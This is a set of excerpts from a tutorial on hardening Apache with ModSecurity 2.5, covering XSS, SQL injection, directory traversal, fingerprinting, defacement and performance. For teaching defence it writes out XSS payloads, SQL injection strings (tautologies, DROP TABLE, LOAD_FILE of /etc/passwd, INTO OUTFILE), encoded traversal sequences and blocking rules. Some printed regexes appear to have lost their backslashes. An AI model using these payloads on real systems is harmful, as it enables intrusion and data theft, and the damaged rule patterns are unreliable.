CSS.) Cross-site scripting attacks can lead not only to cookie and session data being stolen, but also to malware being downloaded and executed and injection of arbitrary content into web pages. Cross-site scripting attacks can generally be divided into two categories: Reflected attacksThis kind of attack exploits cases where the web application takes data provided by the user and includes it without sanitization in output pages. The attack is called "reflected" because an attacker causes a user to provide a malicious script to a server in a request that is then reflected back to the user in returned pages, causing the script to execute. Stored attacksIn this type of XSS attack, the attacker is able to include his malicious payload into data that is permanently stored on the server and will be included without any HTML entity encoding to subsequent visitors to a page. Examples include storing malicious scripts in forum posts or user presentation pages. This type of XSS attack has the potential to be more damaging since it can affect every user who views a certain page. Preventing XSS attacks The most important measure you can take to prevent XSS attacks is to make sure that all user-supplied data that is output in your web pages is properly sanitized. This means replacing potentially unsafe characters, such as angled brackets (< and >) with their corresponding HTML-entity encoded versions—in this case &lt; and &gt;. Here is a list of characters that you should encode when present in user-supplied data that will later be included in web pages: Character HTML-encoded version < &lt; > &gt; ( &#40; ) &#41; # &#35; & &amp; " &quot; ' &#39; In PHP, you can use the htmlentities() function to achieve this. When encoded, the string <script> will be converted into &lt;script&gt;. This latter version will be displayed as <script> in the web browser, without being interpreted as the start of a script by the browser. In general, users should not be allowed to input any HTML markup tags if it can be avoided. If you do allow markup such as <a href="..."> to be input by users in blog comments, forum posts, and similar places then you should be aware that simply filtering out the <script> tag is not enough, as this simple example shows: <a href="http://www.google.com" onMouseOver="javascript:alert('XSS Exploit!')">Innocent link</a> This link will execute the JavaScript code contained within the onMouseOver attribute whenever the user hovers his mouse pointer over the link. You can see why even if the web application replaced <script> tags with their HTML-encoded version, an XSS exploit would still be possible by simply using onMouseOver or any of the other related events available, such as onClick or onMouseDown. I want to stress that properly sanitizing user input as just described is the most important step you can take to prevent XSS exploits from occurring. That said, if you want to add an additional line of defense by creating ModSecurity rules, here are some common XSS script fragments and regular expressions for blocking them: Script fragment Regular expression <script <script eval( evals*( onMouseOver onmouseover onMouseOut onmouseout onMouseDown onmousedown onMouseMove onmousemove onClick onclick onDblClick ondblclick onFocus onfocus PDF XSS protection You may have seen the ModSecurity directive SecPdfProtect mentioned, and wondered what it does. This directive exists to protect users from a particular class of cross-site scripting attack that affects users running a vulnerable version of the Adobe Acrobat PDF reader. A little background is required in order to understand what SecPdfProtect does and why it is necessary. In 2007, Stefano Di Paola and Giorgio Fedon discovered a vulnerability in Adobe Acrobat that allows attackers to insert JavaScript into requests, which is then executed by Acrobat in the context of the site hosting the PDF file. Sound confusing? Hang on, it will become clearer in a moment. The vulnerability was quickly fixed by Adobe in version 7.0.9 of Acrobat. However, there are still many users out there running old versions of the reader, which is why preventing this sort of attack is still an ongoing concern. The basic attack works like this: An attacker entices the victim to click a link to a PDF file hosted on www.example.com. Nothing unusual so far, except for the fact that the link looks like this: http://www.example.com/document.pdf#x=javascript:alert('XSS'); Surprisingly, vulnerable versions of Adobe Acrobat will execute the JavaScript in the above link. It doesn't even matter what you place before the equal sign, gibberish= will work just as well as x= in triggering the exploit. Since the PDF file is hosted on the domain www.example.com, the JavaScript will run as if it was a legitimate piece of script within a page on that domain. This can lead to all of the standard cross-site scripting attacks that we have seen examples of before. This diagram shows the chain of events that allows this exploit to function: The vulnerability does not exist if a user downloads the PDF file and then opens it from his local hard drive. ModSecurity solves the problem of this vulnerability by issuing a redirect for all PDF files. The aim is to convert any URLs like the following: http://www.example.com/document.pdf#x=javascript:alert('XSS'); into a redirected URL that has its own hash character: http://www.example.com/document.pdf#protection This will block any attacks attempting to exploit this vulnerability. The only problem with this approach is that it will generate an endless loop of redirects, as ModSecurity has no way of knowing what is the first request for the PDF file, and what is a request that has already been redirected. ModSecurity therefore uses a one-time token to keep track of redirect requests. All redirected requests get a token included in the new request string. The redirect link now looks like this: http://www.example.com/document.pdf?PDFTOKEN=XXXXX#protection ModSecurity keeps track of these tokens so that it knows which links are valid and should lead to the PDF file being served. Even if a token is not valid, the PDF file will still be available to the user, he will just have to download it to the hard drive. These are the directives used to configure PDF XSS protection in ModSecurity: SecPdfProtect On SecPdfProtectMethod TokenRedirection SecPdfProtectSecret "SecretString" SecPdfProtectTimeout 10 SecPdfProtectTokenName "token" The above configures PDF XSS protection, and uses the secret string SecretString to generate the one-time tokens. The last directive, SecPdfProtectTokenName, can be used to change the name of the token argument (the default is PDFTOKEN). This can be useful if you want to hide the fact that you are running ModSecurity, but unless you are really paranoid it won't be necessary to change this. The SecPdfProtectMethod can also be set to ForcedDownload, which will force users to download the PDF files instead of viewing them in the browser. This can be an inconvenience to users, so you would probably not want to enable this unless circumstances warrant (for example, if a new PDF vulnerability of the same class is discovered in the future). HttpOnly cookies to prevent XSS attacks One mechanism to mitigate the impact of XSS vulnerabilities is the HttpOnly flag for cookies. This extension to the cookie protocol was proposed by Microsoft (see http://msdn.microsoft.com/en-us/library/ms533046.aspx for a description), and is currently supported by the following browsers: Internet Explorer (IE6 SP1 and later) Firefox (2.0.0.5 and later) Google Chrome (all versions) Safari (3.0 and later) Opera (version 9.50 and later) HttpOnly cookies work by adding the HttpOnly flag to cookies that are returned by the server, which instructs the web browser that the cookie should only be used when sending HTTP requests to the server and should not be made available to client-side scripts via for example the document.cookie property. While this doesn't completely solve the problem of XSS attacks, it does mitigate those attacks where the aim is to steal valuable information from the user's cookies, such as for example session IDs. A cookie header with the HttpOnly flag set looks like this: Set-Cookie: SESSID=d31cd4f599c4b0fa4158c6fb; HttpOnly HttpOnly cookies need to be supported on the server-side for the clients to be able to take advantage of the extra protection afforded by them. Some web development platforms currently support HttpOnly cookies through the use of the appropriate configuration option. For example, PHP 5.2.0 and later allow HttpOnly cookies to be enabled for a page by using the following ini_set() call: <?php ini_set("session.cookie_httponly", 1); ?> Tomcat (a Java Servlet and JSP server) version 6.0.19 and later supports HttpOnly cookies, and they can be enabled by modifying a context's configuration so that it includes the useHttpOnly option, like so: <Context> <Manager useHttpOnly="true" /> </Context> In case you are using a web platform that doesn't support HttpOnly cookies, it is actually possible to use ModSecurity to add the flag to outgoing cookies. We will see how to do this now. Session identifiers Assuming we want to add the HttpOnly flag to session identifier cookies, we need to know which cookies are associated with session identifiers. The following table lists the name of the session identifier cookie for some of the most common languages: Language Session identifier cookie name PHP PHPSESSID JSP JSESSIONID ASP ASPSESSIONID ASP.NET ASP.NET_SessionId The table shows us that a good regular expression to identify session IDs would be (sessionid|sessid), which can be shortened to sess(ion)?id. The web programming language you are using might use another name for the session cookie. In that case, you can always find out what it is by looking at the headers returned by the server: echo -e "GET / HTTP/1.1nHost:yourserver.comnn"|nc yourserver.com 80|head Look for a line similar to: Set-Cookie: JSESSIONID=4EFA463BFB5508FFA0A3790303DE0EA5; Path=/ This is the session cookie—in this case the name of it is JESSIONID, since the server is running Tomcat and the JSP web application language. The following rules are used to add the HttpOnly flag to session cookies: # # Add HttpOnly flag to session cookies # SecRule RESPONSE_HEADERS:Set-Cookie "!(?i:HttpOnly)" "phase:3,chain,pass" SecRule MATCHED_VAR "(?i:sess(ion)?id)" "setenv:session_ cookie=%{MATCHED_VAR}" Header set Set-Cookie "%{SESSION_COOKIE}e; HttpOnly" env=session_ cookie We are putting the rule chain in phase 3—RESPONSE_HEADERS, since we want to inspect the response headers for the presence of a Set-Cookie header. We are looking for those Set-Cookie headers that do not contain an HttpOnly flag. The (?i: ) parentheses are a regular expression construct known as a mode-modified span. This tells the regular expression engine to ignore the case of the HttpOnly string when attempting to match. Using the t:lowercase transform would have been more complicated, as we will be using the matched variable in the next rule, and we don't want the case of the variable modified when we set the environment variable.
Read more
  • 0
  • 0
  • 3920

article-image-blocking-common-attacks-using-modsecurity-25-part-1
Packt
01 Dec 2009
11 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 1

Packt
01 Dec 2009
11 min read
Web applications can be attacked from a number of different angles, which is what makes defending against them so difficult. Here are just a few examples of where things can go wrong to allow a vulnerability to be exploited: The web server process serving requests can be vulnerable to exploits. Even servers such as Apache, that have a good security track record, can still suffer from security problems - it's just a part of the game that has to be accepted. The web application itself is of course a major source of problems. Originally, HTML documents were meant to be just that - documents. Over time, and especially in the last few years, they have evolved to also include code, such as client-side JavaScript. This can lead to security problems. A parallel can be drawn to Microsoft Office, which in earlier versions was plagued by security problems in its macro programming language. This, too, was caused by documents and executable code being combined in the same file. Supporting modules, such as mod_php which is used to run PHP scripts, can be subject to their own security vulnerabilities. Backend database servers, and the way that the web application interacts with them, can be a source of problems ranging from disclosure of confidential information to loss of data. HTTP fingerprinting Only amateur attackers blindly try different exploits against a server without having any idea beforehand whether they will work or not. More sophisticated adversaries will map out your network and system to find out as much information as possible about the architecture of your network and what software is running on your machines. An attacker looking to break in via a web server will try to find one he knows he can exploit, and this is where a method known as HTTP fingerprinting comes into play. We are all familiar with fingerprinting in everyday life - the practice of taking a print of the unique pattern of a person's finger to be able to identify him or her - for purposes such as identifying a criminal or opening the access door to a biosafety laboratory. HTTP fingerprinting works in a similar manner by examining the unique characteristics of how a web server responds when probed and constructing a fingerprint from the gathered information. This fingerprint is then compared to a database of fingerprints for known web servers to determine what server name and version is running on the target system. More specifically, HTTP fingerprinting works by identifying subtle differences in the way web servers handle requests - a differently formatted error page here, a slightly unusual response header there - to build a unique profile of a server that allows its name and version number to be identified. Depending on which viewpoint you take, this can be useful to a network administrator to identify which web servers are running on a network (and which might be vulnerable to attack and need to be upgraded), or it can be useful to an attacker since it will allow him to pinpoint vulnerable servers. We will be focusing on two fingerprinting tools: httprint One of the original tools - the current version is 0.321 from 2005, so it hasn't been updated with new signatures in a while. Runs on Linux, Windows, Mac OS X, and FreeBSD. httprecon This is a newer tool which was first released in 2007. It is still in active development. Runs on Windows. Let's first run httprecon against a standard Apache 2.2 server: And now let's run httprint against the same server and see what happens: As we can see, both tools correctly guess that the server is running Apache. They get the minor version number wrong, but both tell us that the major version is Apache 2.x. Try it against your own server! You can download httprint at http://www.net-square.com/httprint/ and httprecon at http://www.computec.ch/projekte/httprecon/. Tip If you get the error message Fingerprinting Error: Host/URL not found when running httprint, then try specifying the IP address of the server instead of the hostname. The fact that both tools are able to identify the server should come as no surprise as this was a standard Apache server with no attempts made to disguise it. In the following sections, we will be looking at how fingerprinting tools distinguish different web servers and see if we are able to fool them into thinking the server is running a different brand of web server software. How HTTP fingerprinting works There are many ways a fingerprinting tool can deduce which type and version of web server is running on a system. Let's take a look at some of the most common ones. Server banner The server banner is the string returned by the server in the Server response header (for example: Apache/1.3.3 (Unix) (Red Hat/Linux)). This banner can be changed by using the ModSecurity directive SecServerSignature. Here is what to do to change the banner: # Change the server banner to MyServer 1.0ServerTokens FullSecServerSignature "MyServer 1.0" Response header The HTTP response header contains a number of fields that are shared by most web servers, such as Server, Date, Accept-Ranges, Content-Length, and Content-Type. The order in which these fields appear can give a clue as to which web server type and version is serving the response. There can also be other subtle differences - the Netscape Enterprise Server, for example, prints its headers as Last-modified and Accept-ranges, with a lowercase letter in the second word, whereas Apache and Internet Information Server print the same headers as Last-Modified and Accept-Ranges. HTTP protocol responses An other way to gain information on a web server is to issue a non-standard or unusual HTTP request and observe the response that is sent back by the server. Issuing an HTTP DELETE request The HTTP DELETE command is meant to be used to delete a document from a server. Of course, all servers require that a user is authenticated before this happens, so a DELETE command from an unauthorized user will result in an error message - the question is just which error message exactly, and what HTTP error number will the server be using for the response page? Here is a DELETE request issued to our Apache server: $ nc bytelayer.com 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedDate: Mon, 27 Apr 2009 09:10:49 GMTServer: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2Allow: GET,HEAD,POST,OPTIONS,TRACEContent-Length: 303Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method DELETE is not allowed for the URL /index.html.</p><hr><address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address></body></html> As we can see, the server returned a 405 - Method Not Allowed error. The error message accompanying this response in the response body is given as The requested method DELETE is not allowed for the URL/index.html. Now compare this with the following response, obtained by issuing the same request to a server at www.iis.net: $ nc www.iis.net 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedAllow: GET, HEAD, OPTIONS, TRACEContent-Type: text/htmlServer: Microsoft-IIS/7.0Set-Cookie: CSAnonymous=LmrCfhzHyQEkAAAANWY0NWY1NzgtMjE2NC00NDJjLWJlYzYtNTc4ODg0OWY5OGQz0; domain=iis.net; expires=Mon, 27-Apr-2009 09:42:35GMT; path=/; HttpOnlyX-Powered-By: ASP.NETDate: Mon, 27 Apr 2009 09:22:34 GMTConnection: closeContent-Length: 1293<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html ><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>405 - HTTP verb used to access this page is not allowed.</title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;}h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;}h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;fontfamily:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style>< /head><body><div id="header"><h1>Server Error</h1></div><div id="content"><div class="content-container"><fieldset> <h2>405 - HTTP verb used to access this page is not allowed.</h2> <h3>The page you are looking for cannot be displayed because aninvalid method (HTTP verb) was used to attempt access.</h3> </fieldset></div></div></body></html> The site www.iis.net is Microsoft's official site for its web server platform Internet Information Services, and the Server response header indicates that it is indeed running IIS-7.0. (We have of course already seen that it is a trivial operation in most cases to fake this header, but given the fact that it's Microsoft's official IIS site we can be pretty sure that they are indeed running their own web server software.) The response generated from IIS carries the same HTTP error code, 405; however there are many subtle differences in the way the response is generated. Here are just a few: IIS uses spaces in between method names in the comma separated list for the Allow field, whereas Apache does not The response header field order differs - for example, Apache has the Date field first, whereas IIS starts out with the Allow field IIS uses the error message The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access in the response body Bad HTTP version numbers A similar experiment can be performed by specifying a non-existent HTTP protocol version number in a request. Here is what happens on the Apache server when the request GET / HTTP/5.0 is issued: $ nc bytelayer.com 80GET / HTTP/5.0HTTP/1.1 400 Bad RequestDate: Mon, 27 Apr 2009 09:36:10 GMTServer: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2Content-Length: 295Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could notunderstand.<br /></p><hr><address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address></body></html> There is no HTTP version 5.0, and there probably won't be for a long time, as the latest revision of the protocol carries version number 1.1. The Apache server responds with a 400 - Bad Request Error, and the accompanying error message in the response body is Your browser sent a request that this server could not understand. Now let's see what IIS does: $ nc www.iis.net 80GET / HTTP/5.0HTTP/1.1 400 Bad RequestContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 27 Apr 2009 09:38:37 GMTConnection: closeContent-Length: 334<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=usascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML> We get the same error number, but the error message in the response body differs - this time it's HTTP Error 400. The request hostname is invalid. As HTTP 1.1 requires a Host header to be sent with requests, it is obvious that IIS assumes that any later protocol would also require this header to be sent, and the error message reflects this fact.
Read more
  • 0
  • 0
  • 4358

article-image-blocking-common-attacks-using-modsecurity-25-part-3
Packt
01 Dec 2009
12 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 3

Packt
01 Dec 2009
12 min read
Source code revelation Normally, requesting a file with a .php extension will cause mod_php to execute the PHP code contained within the file and then return the resulting web page to the user. If the web server is misconfigured (for example if mod_php is not loaded) then the .php file will be sent by the server without interpretation, and this can be a security problem. If the source code contains credentials used to connect to an SQL database then that opens up an avenue for attack, and of course the source code being available will allow a potential attacker to scrutinize the code for vulnerabilities. Preventing source code revelation is easy. With response body access on in ModSecurity, simply add a rule to detect the opening PHP tag: Prevent PHP source code from being disclosed SecRule RESPONSE_BODY "<?" "deny,msg:'PHP source code disclosure blocked'" Preventing Perl and JSP source code from being disclosed works in a similar manner: # Prevent Perl source code from being disclosed SecRule RESPONSE_BODY "#!/usr/bin/perl" "deny,msg:'Perl source code disclosure blocked'" # Prevent JSP source code from being disclosed SecRule RESPONSE_BODY "<%" "deny,msg:'JSP source code disclosure blocked'" Directory traversal attacks Normally, all web servers should be configured to reject attempts to access any document that is not under the web server's root directory. For example, if your web server root is /home/www, then attempting to retrieve /home/joan/.bashrc should not be possible since this file is not located under the /home/www web server root. The obvious attempt to access the /home/joan directory is, of course, easy for the web server to block, however there is a more subtle way to access this directory which still allows the path to start with /home/www, and that is to make use of the .. symbolic directory link which links to the parent directory in any given directory. Even though most web servers are hardened against this sort of attack, web applications that accept input from users may still not be checking it properly, potentially allowing users to get access to files they shouldn't be able to view via simple directory traversal attacks. This alone is reason to implement protection against this sort of attack using ModSecurity rules. Furthermore, keeping with the principle of Defense in Depth, having multiple protections against this vulnerability can be beneficial in case the web server should contain a flaw that allows this kind of attack in certain circumstances. There is more than one way to validly represent the .. link to the parent directory. URL encoding of .. yields % 2e% 2e, and adding the final slash at the end we end up with % 2e% 2e% 2f(please ignore the space). Here, then is a list of what needs to be blocked: ../ ..% 2f .% 2e/ %  2e%  2e% 2f % 2e% 2e/ % 2e./ Fortunately, we can use the ModSecurity transformation t:urlDecode. This function does all the URL decoding for us, and will allow us to ignore the percent-encoded values, and thus only one rule is needed to block these attacks: SecRule REQUEST_URI "../" "t:urlDecode,deny" Blog spam The rise of weblogs, or blogs, as a new way to present information, share thoughts, and keep an online journal has made way for a new phenomenon: blog comments designed to advertise a product or drive traffic to a website. Blog spam isn't a security problem per se, but it can be annoying and cost a lot of time when you have to manually remove spam comments (or delete them from the approval queue, if comments have to be approved before being posted on the blog). Blog spam can be mitigated by collecting a list of the most common spam phrases, and using the ability of ModSecurity to scan POST data. Any attempted blog comment that contains one of the offending phrases can then be blocked. From both a performance and maintainability perspective, using the @pmFromFile operator is the best choice when dealing with large word lists such as spam phrases. To create the list of phrases to be blocked, simply insert them into a text file, for example, /usr/local/spamlist.txt: viagra v1agra auto insurance rx medications cheap medications ... Then create ModSecurity rules to block those phrases when they are used in locations such as the page that creates new blog comments: # # Prevent blog spam by checking comment against known spam # phrases in file /usr/local/spamlist.txt # <Location /blog/comment.php> SecRule ARGS "@pmFromFile /usr/local/spamlist.txt" "t: lowercase,deny,msg:'Blog spam blocked'" </Location> Keep in mind that the spam list file can contain whole sentences—not just single words—so be sure to take advantage of that fact when creating the list of known spam phrases. SQL injection SQL injection attacks can occur if an attacker is able to supply data to a web application that is then used in unsanitized form in an SQL query. This can cause the SQL query to do completely different things than intended by the developers of the web application. Consider an SQL query like this: SELECT * FROM user WHERE username = '%s' AND password = '%s'; The flaw here is that if someone can provide a password that looks like ' OR '1'='1, then the query, with username and password inserted, will become: SELECT * FROM user WHERE username = 'anyuser' AND password = '' OR '1'='1'; This query will return all users in the results table, since the OR '1'='1' part at the end of the statement will make the entire statement true no matter what username and password is provided. Standard injection attempts Let's take a look at some of the most common ways SQL injection attacks are performed. Retrieving data from multiple tables with UNION An SQL UNION statement can be used to retrieve data from two separate tables. If there is one table named cooking_recipes and another table named user_credentials, then the following SQL statement will retrieve data from both tables: SELECT dish_name FROM recipe UNION SELECT username, password FROM user_credentials; It's easy to see how the UNION statement can allow an attacker to retrieve data from other tables in the database if he manages to sneak it into a query. A similar SQL statement is UNION ALL, which works almost the same way as UNION—the only difference is that UNION ALL will not eliminate any duplicate rows returned in the result. Multiple queries in one call If the SQL engine allows multiple statements in a single SQL query then seemingly harmless statements such as the following can present a problem: SELECT * FROM products WHERE id = %d; If an attacker is able to provide an ID parameter of 1; DROP TABLE products;, then the statement suddenly becomes: SELECT * FROM products WHERE id = 1; DROP TABLE products; When the SQL engine executes this, it will first perform the expected SELECT query, and then the DROP TABLE products statement, which will cause the products table to be deleted. Reading arbitrary files MySQL can be used to read data from arbitrary files on the system. This is done by using the LOAD_FILE() function: SELECT LOAD_FILE("/etc/passwd"); This command returns the contents of the file /etc/passwd. This works for any file to which the MySQL process has read access. Writing data to files MySQL also supports the command INTO OUTFILE which can be used to write data into files. This attack illustrates how dangerous it can be to include user-supplied data in SQL commands, since with the proper syntax, an SQL command can not only affect the database, but also the underlying file system. This simple example shows how to use MySQL to write the string some data into the file test.txt: mysql> SELECT "some data" INTO OUTFILE "test.txt"; Preventing SQL injection attacks There are three important steps you need to take to prevent SQL injection attacks: Use SQL prepared statements. Sanitize user data. Use ModSecurity to block SQL injection code supplied to web applications. These are in order of importance, so the most important consideration should always be to make sure that any code querying SQL databases that relies on user input should use prepared statements. A prepared statement looks as follows: SELECT * FROM books WHERE isbn = ? AND num_copies < ?; This allows the SQL engine to replace the question marks with the actual data. Since the SQL engine knows exactly what is data and what SQL syntax, this prevents SQL injection from taking place. The advantages of using prepared statements are twofold: They effectively prevent SQL injection. They speed up execution time, since the SQL engine can compile the statement once, and use the pre-compiled statement on all subsequent query invocations. So not only will using prepared statements make your code more secure—it will also make it quicker. The second step is to make sure that any user data used in SQL queries is sanitized. Any unsafe characters such as single quotes should be escaped. If you are using PHP, the function mysql_real_escape_string() will do this for you. Finally, let's take a look at strings that ModSecurity can help block to prevent SQL injection attacks. What to block The following table lists common SQL commands that you should consider blocking, together with a suggested regular expression for blocking. The regular expressions are in lowercase and therefore assume that the t:lowercase transformation function is used. SQL code Regular expression UNION SELECT unions+select UNION ALL SELECT unions+alls+select INTO OUTFILE intos+outfile DROP TABLE drops+table ALTER TABLE alters+table LOAD_FILE load_file SELECT * selects+* For example, a rule to detect attempts to write data into files using INTO OUTFILE looks as follows: SecRule ARGS "intos+outfile" "t:lowercase,deny,msg: 'SQL Injection'" The s+ regular expression syntax allows for detection of an arbitrary number of whitespace characters. This will detect evasion attempts such as INTO%20%20OUTFILE where multiple spaces are used between the SQL command words. Website defacement We've all seen the news stories: "Large Company X was yesterday hacked and their homepage was replaced with an obscene message". This sort of thing is an everyday occurrence on the Internet. After the company SCO initiated a lawsuit against Linux vendors citing copyright violations in the Linux source code, the SCO corporate website was hacked and an image was altered to read WE OWN ALL YOUR CODE—pay us all your money. The hack was subtle enough that the casual visitor to the SCO site would likely not be able to tell that this was not the official version of the homepage: The above image shows what the SCO homepage looked like after being defaced—quite subtle, don't you think? Preventing website defacement is important for a business for several reasons: Potential customers will turn away when they see the hacked site There will be an obvious loss of revenue if the site is used for any sort of e-commerce sales Bad publicity will tarnish the company's reputation Defacement of a site will of course depend on a vulnerability being successfully exploited. The measures we will look at here are aimed to detect that a defacement has taken place, so that the real site can be restored as quickly as possible. Detection of website defacement is usually done by looking for a specific token in the outgoing web pages. This token has been placed within the pages in advance specifically so that it may be used to detect defacement—if the token isn't there then the site has likely been defaced. This can be sufficient, but it can also allow the attacker to insert the same token into his defaced page, defeating the detection mechanism. Therefore, we will go one better and create a defacement detection technology that will be difficult for the hacker to get around. To create a dynamic token, we will be using the visitor's IP address. The reason we use the IP address instead of the hostname is that a reverse lookup may not always be possible, whereas the IP address will always be available. The following example code in JSP illustrates how the token is calculated and inserted into the page. <%@ page import="java.security.*" %> <% String tokenPlaintext = request.getRemoteAddr(); String tokenHashed = ""; String hexByte = ""; // Hash the IP address MessageDigest md5 = MessageDigest.getInstance("MD5"); md5.update(tokenPlaintext.getBytes()); byte[] digest = md5.digest(); for (int i = 0; i < digest.length; i++) { hexByte = Integer.toHexString(0xFF & digest[i]); if (hexByte.length() < 2) { hexByte = "0" + hexByte; } tokenHashed += hexByte; } // Write MD5 sum token to HTML document out.println(String.format("<span style='color: white'>%s</span>", tokenHashed)); %>   Assuming the background of the page is white, the <span style="color: white"> markup will ensure it is not visible to website viewers. Now for the ModSecurity rules to handle the defacement detection. We need to look at outgoing pages and make sure that they include the appropriate token. Since the token will be different for different users, we need to calculate the same MD5 sum token in our ModSecurity rule and make sure that this token is included in the output. If not, we block the page from being sent and sound the alert by sending an email message to the website administrator. # # Detect and block outgoing pages not containing our token # SecRule REMOTE_ADDR ".*" "phase:4,deny,chain,t:md5,t:hexEncode, exec:/usr/bin/emailadmin.sh" SecRule RESPONSE_BODY "!@contains %{MATCHED_VAR}" We are placing the rule in phase 4 since this is required when we want to inspect the response body. The exec action is used to send an email to the website administrator to let him know of the website defacement.
Read more
  • 0
  • 1
  • 8089

article-image-ways-improve-performance-your-server-modsecurity-25
Packt
30 Nov 2009
13 min read
Save for later

Ways to improve performance of your server in ModSecurity 2.5

Packt
30 Nov 2009
13 min read
A typical HTTP request To get a better picture of the possible delay incurred when using a web application firewall, it helps to understand the anatomy of a typical HTTP request, and what processing time a typical web page download will incur. This will help us compare any added ModSecurity processing time to the overall time for the entire request. When a user visits a web page, his browser first connects to the server and downloads the main resource requested by the user (for example, an .html file). It then parses the downloaded file to discover any additional files, such as images or scripts, that it must download to be able to render the page. Therefore, from the point of view of a web browser, the following sequence of events happens for each file: Connect to web server. Request required file. Wait for server to start serving file. Download file. Each of these steps adds latency, or delay, to the request. A typical download time for a web page is on the order of hundreds of milliseconds per file for a home cable/DSL user. This can be slower or faster, depending on the speed of the connection and the geographical distance between the client and server. If ModSecurity adds any delay to the page request, it will be to the server processing time, or in other words the time from when the client has connected to the server to when the last byte of content has been sent out to the client. Another aspect that needs to be kept in mind is that ModSecurity will increase the memory usage of Apache. In what is probably the most common Apache configuration, known as "prefork", Apache starts one new child process for each active connection to the server. This means that the number of Apache instances increases and decreases depending on the number of client connections to the server.As the total memory usage of Apache depends on the number of child processes running and the memory usage of each child process, we should look at the way ModSecurity affects the memory usage of Apache. A real-world performance test In this section we will run a performance test on a real web server running Apache 2.2.8 on a Fedora Linux server (kernel 2.6.25). The server has an Intel Xeon 2.33 GHz dual-core processor and 2 GB of RAM. We will start out benchmarking the server when it is running just Apache without having ModSecurity enabled. We will then run our tests with ModSecurity enabled but without any rules loaded. Finally, we will test ModSecurity with a ruleset loaded so that we can draw conclusions about how the performance is affected. The rules we will be using come supplied with ModSecurity and are called the "core ruleset". The core ruleset The ModSecurity core ruleset contains over 120 rules and is shipped with the default ModSecurity source distribution (it's contained in the rules sub-directory). This ruleset is designed to provide "out of the box" protection against some of the most common web attacks used today. Here are some of the things that the core ruleset protects against: Suspicious HTTP requests (for example, missing User-Agent or Accept headers) SQL injection Cross-Site Scripting (XSS) Remote code injection File disclosure We will examine these methods of attack, but for now, let's use the core ruleset and examine how enabling it impacts the performance of your web service. Installing the core ruleset To install the core ruleset, create a new sub-directory named modsec under your Apache conf directory (the location will vary depending on your distribution). Then copy all the .conf files from the rules sub-directory of the source distribution to the new modsec directory: mkdir /etc/httpd/conf/modseccp/home/download/modsecurity-apache/rules/modsecurity_crs_*.conf /etc/httpd/conf/modsec Finally, enter the following line in your httpd.conf file and restart Apache to make it read the new rule files: # Enable ModSecurity core rulesetInclude conf/modsecurity/*.conf Putting the core rules in a separate directory makes it easy to disable them—all you have to do is comment out the above Include line in httpd.conf, restart Apache, and the rules will be disabled. Making sure it works The core ruleset contains a file named modsecurity_crs_10_config.conf. This file contains some of the basic configuration directives needed to turn on the rule engine and configure request and response body access. Since we have already configured these directives, we do not want this file to conflict with our existing configuration, and so we need to disable this. To do this, we simply need to rename the file so that it has a different extension as Apache only loads *.conf files with the Include directive we used above: $ mv modsecurity_crs_10_config.conf modsecurity_crs_10_config.conf.disabled Once we have restarted Apache, we can test that the core ruleset is loaded by attempting to access an URL that it should block. For example, try surfing to http://yourserver/ftp.exe and you should get the error message Method Not Implemented, ensuring that the core rules are loaded. Performance testing basics So what effect does loading the core ruleset have on web application response time and how do we measure this? We could measure the response time for a single request with and without the core ruleset loaded, but this wouldn't have any statistical significance—it could happen that just as one of the requests was being processed, the server started to execute a processor-intensive scheduled task, causing a delayed response time. The best way to compare the response times is to issue a large number of requests and look at the average time it takes for the server to respond. An excellent tool—and the one we are going to use to benchmark the server in the following tests—is called httperf. Written by David Mosberger of Hewlett Packard Research Labs, httperf allows you to simulate high workloads against a web server and obtain statistical data on the performance of the server. You can obtain the program at http://www.hpl.hp.com/research/linux/httperf/ where you'll also find a useful manual page in the PDF file format and a link to the research paper published together with the first version of the tool. Using httperf We'll run httperf with the options --hog (use as many TCP ports as needed), --uri/index.html (request the static web page index.html) and we'll use --num-conn 1000 (initiate a total of 1000 connections). We will be varying the number of requests per second (specified using --rate) to see how the server responds under different workloads. This is what the typical output from httperf looks like when run with the above options: $ ./httperf --hog --server=bytelayer.com --uri /index.html --num-conn1000 --rate 50Total: connections 1000 requests 1000 replies 1000 test-duration20.386 sConnection rate: 49.1 conn/s (20.4 ms/conn, <=30 concurrentconnections)Connection time [ms]: min 404.1 avg 408.2 max 591.3 median 404.5stddev 16.9Connection time [ms]: connect 102.3Connection length [replies/conn]: 1.000Request rate: 49.1 req/s (20.4 ms/req)Request size 